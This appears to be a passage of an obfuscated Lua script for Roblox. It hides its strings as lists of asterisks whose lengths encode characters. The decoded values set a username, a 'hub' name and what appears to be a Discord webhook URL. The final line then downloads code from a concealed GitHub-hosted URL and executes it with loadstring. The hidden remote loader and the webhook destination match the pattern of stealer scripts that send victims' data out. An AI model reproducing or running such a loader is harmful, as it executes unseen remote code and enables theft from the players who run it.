ab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


_G.Username = FgNEqZUcCRWTfC({'***********************************************************************************************************','******************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','*************************************************************************************************************************','*****************************************************************************************************','********************************************************************************************************************','*****************************************************'})
_G.HubName = FgNEqZUcCRWTfC({'**********************************************************************','*************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','********************************','************************************************************************','*********************************************************************************************************************','**************************************************************************************************'})
_G.WebhookUrl = FgNEqZUcCRWTfC({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************','*************************************************','************************************************','**************************************************','*****************************************************','**************************************************','*****************************************************','*****************************************************','********************************************************','******************************************************','*************************************************','*************************************************','******************************************************','*******************************************************','*************************************************','********************************************************','*******************************************************','**************************************************','***************************************************','***********************************************','********************************************************************','*************************************************************************','********************************************************************','******************************************************','*****************************************************************************************************','*****************************************************************************************************','******************************************************************************************************','*************************************************************************************************************','****************************************************','**********************************************************************************************************','*************************************************************************************************************','******************************************************','*********************************************************************************************************','*****************************************************************************************************************','**************************************************************************************************','*************************************************************************************','*********************************************************************************************************************','************************************************','****************************************************','***********************************************************************************************************************','***************************************************************************************************','*********************************************************************','***************************************************','******************************************************************************','******************************************************************************************','*********************************************','***********************************************************************************','***********************************************************************************','******************************************************************************************************','*********************************************************************************************************************','***************************************************************************************','*******************************************************','******************************************************','*****************************************************','***************************************************************************','******************************************************************************************************************','***********************************************************************************************','********************************************************************','*************************************************************************************************************************','*************************************************************************************************','******************************************************************************************************','********************************************************************************************************************','******************************************************************','************************************************************************************************************************','*************************************************','**********************************************************************','*****************************************************************************************************','*************************************************','*******************************************************','******************************************************************************************************','**********************************************************************','******************************************************************************************************','****************************************************************************','*************************************************************************','*****************************************************************************************************','***************************************************************************************************','********************************************************************************************************','*******************************************************************************************************************','************************************************','*********************************************************************************************************','***************************************************************************','*****************************************************************************************','****************************************************************************','*****************************************************************************************************************','********************************************************************************','*********************************************************************************','**************************************************************************************','**********************************************************************************************************************'})

loadstring(game:HttpGet(FgNEqZUcCRWTfC({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','**************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*********************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','**************************************************************************************************************','*********************************************************************************************************','*********************************************************************************************************','***********************************************','********************************************************************************','*****************************************************************************************************','*************************************************************************************************','***********************************************************************************************************','*******************************************************************************','**************************************************************************************************************','************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','****************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','***********************************************************************************************************','**********************************************','************************************************************************************************************','*********************************************************************************************************************','*************************************************************************************************'})))()    
